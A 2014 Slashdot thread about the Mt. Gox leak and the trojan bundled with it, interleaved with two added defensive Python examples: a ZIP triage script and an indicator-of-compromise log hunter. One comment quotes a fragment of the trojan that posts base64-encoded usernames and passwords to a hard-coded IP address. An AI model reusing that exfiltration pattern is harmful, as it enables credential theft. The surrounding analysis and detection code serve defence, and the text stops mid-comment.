        The thing is, you don't need that .exe to access the leaked data. The leaks are just a bunch of csv files. I never run the .exe.
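The point made in the comment above (the leaked data is plain CSV and the bundled binaries are not needed to read it) can be checked before anything is unpacked. This is an added example, not code from the thread or from Kaspersky: it classifies each ZIP member by its leading magic bytes rather than its name, and the sample archive and its member names are constructed for illustration.

```python
import io
import zipfile

# Leading magic bytes of native executables and nested archives.
MAGIC = {
    b"MZ": "Windows PE executable",
    b"\xfe\xed\xfa\xce": "Mach-O 32-bit",
    b"\xfe\xed\xfa\xcf": "Mach-O 64-bit",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit (byte-swapped)",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit (byte-swapped)",
    b"\xca\xfe\xba\xbe": "Mach-O universal binary or Java class",
    b"\x7fELF": "ELF executable",
    b"PK\x03\x04": "nested ZIP archive",
}

def classify(head):
    """Map the first bytes of a file to a label, or None for plain data."""
    for magic, label in MAGIC.items():
        if head.startswith(magic):
            return label
    return None

def triage_zip(source):
    """Return {member: label} for members that are not plain data.
    Members are read in memory only; nothing is extracted to disk or run."""
    flagged = {}
    with zipfile.ZipFile(source) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.flag_bits & 0x1:  # encrypted: contents cannot be inspected
                flagged[info.filename] = "encrypted member, not inspected"
                continue
            with zf.open(info) as fh:
                label = classify(fh.read(8))
            if label:
                flagged[info.filename] = label
    return flagged

def build_sample():
    """Constructed archive: two CSV-named members, one of which is really a PE stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("trades/2014-01.csv", "id,date,amount\n1,2014-01-01,0.5\n")
        zf.writestr("trades/summary.csv", b"MZ\x90\x00" + b"\x00" * 60)
        zf.writestr("tools/viewer.app/Contents/MacOS/viewer", b"\xcf\xfa\xed\xfe" + b"\x00" * 28)
    buf.seek(0)
    return buf

if __name__ == "__main__":
    for name, label in triage_zip(build_sample()).items():
        print(f"{name}: {label}")
```

Because the check ignores file names, a binary renamed to `.csv` is still flagged; a text file that happens to begin with the letters `MZ` would be flagged too and needs a manual look.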

  • Old news. (Score:4, Informative)

    by Janek Kozicki (722688) on Monday March 17, 2014 @08:14PM (#46512161) Journal
    Coindesk already wrote about that [coindesk.com] almost two weeks ago!
    • We're like the Supreme Court here, Janek.

      If you make your way successfully through district and appeals, we might be willing to hear and comment on your case.

    • by guacamole (24270)

      Yeah, but slashdot is not coindesk. I still appreciate this gets posted on /.

  • Looks like someone posted code that shows the censored IP http://pastebin.com/w2EWMp35 [pastebin.com]

    • by mythosaz (572040)

      I'm mostly amused by the User-Agent:


            set the httpHeaders to "User-Agent: MtGoxBackOffice v0.1.2"
            libURLSetSSLVerification false
            post base64Encode("action=login&user="&field "l"&"&pass="&keyBuff&return) to "http://82.118.242.145/admin/tibanne-admin.php"
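The snippet quoted in the comment above exposes three network indicators: the `MtGoxBackOffice` User-Agent, the destination host, and the `/admin/tibanne-admin.php` path. The following added example (not part of the thread or of the malware) hunts for them in web-proxy logs and reports which internal clients matched; the log layout and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from the snippet quoted in the comment above.
IOC_USER_AGENT = "MtGoxBackOffice"
IOC_HOST = "82.118.242.145"
IOC_PATH = "/admin/tibanne-admin.php"

# Assumed log layout (constructed for this example):
#   timestamp client method url status "user-agent"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

def match_reasons(line):
    """Return (client, [matched indicator names]) or None if the line is unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m["url"])
    reasons = []
    if IOC_USER_AGENT.lower() in m["ua"].lower():
        reasons.append("user-agent")
    if url.hostname == IOC_HOST:
        reasons.append("host")
    if url.path.lower() == IOC_PATH:
        reasons.append("path")
    return m["client"], reasons

def hunt(lines):
    """Group matched indicators by client so affected hosts can be triaged."""
    hits = {}
    for line in lines:
        parsed = match_reasons(line)
        if parsed and parsed[1]:
            client, reasons = parsed
            hits.setdefault(client, set()).update(reasons)
    return hits

# Constructed sample log lines.
SAMPLE_LOG = [
    '2014-03-10T09:14:02Z 10.0.0.21 GET http://example.com/index.html 200 "Mozilla/5.0"',
    '2014-03-10T09:14:07Z 10.0.0.37 POST http://82.118.242.145/admin/tibanne-admin.php 200 "MtGoxBackOffice v0.1.2"',
    '2014-03-10T09:15:40Z 10.0.0.52 POST http://82.118.242.145/admin/tibanne-admin.php 404 "curl/7.35.0"',
    '2014-03-10T09:16:11Z 10.0.0.21 GET http://example.org/admin/login.php 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, reasons in sorted(hunt(SAMPLE_LOG).items()):
        print(client, sorted(reasons))
```

Matching on host and path as well as the User-Agent catches traffic from tools that do not send the distinctive header, as the third sample line shows.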

  • Almost every aspect of Bitcoin is just seeping with get rich quick scammers, schemers, and thieves and just general disgusting lowlifes. Whatever money I might have made by holding onto my bitcoins, it was worth losing just to get out of Bitcoin and not have to associate myself with that den of scum and villainy anymore.

    • You'll find the same with the forex market and other dodgy investment schemes.

      Trading and investing is basically a game of "who is the better legal scammer".
      At its core, it's a game with its own rules and dirty (but legal) tricks and unsportsmanlike behavior.

      • by Bryan Ischo (893) *

        "legal scammer" is an oxymoron, but I suspect you know that.

        I also suspect that you know there is a real difference between legal forms of investment, with which you will find associated every kind of good and bad person in the world, but predominantly "normal" people availing themselves of opportunities to invest their money as they see fit, and generally with protections and expectations of security that are in the vast majority of cases respected.

        Then you have bitcoin, where you have an extremely high ch
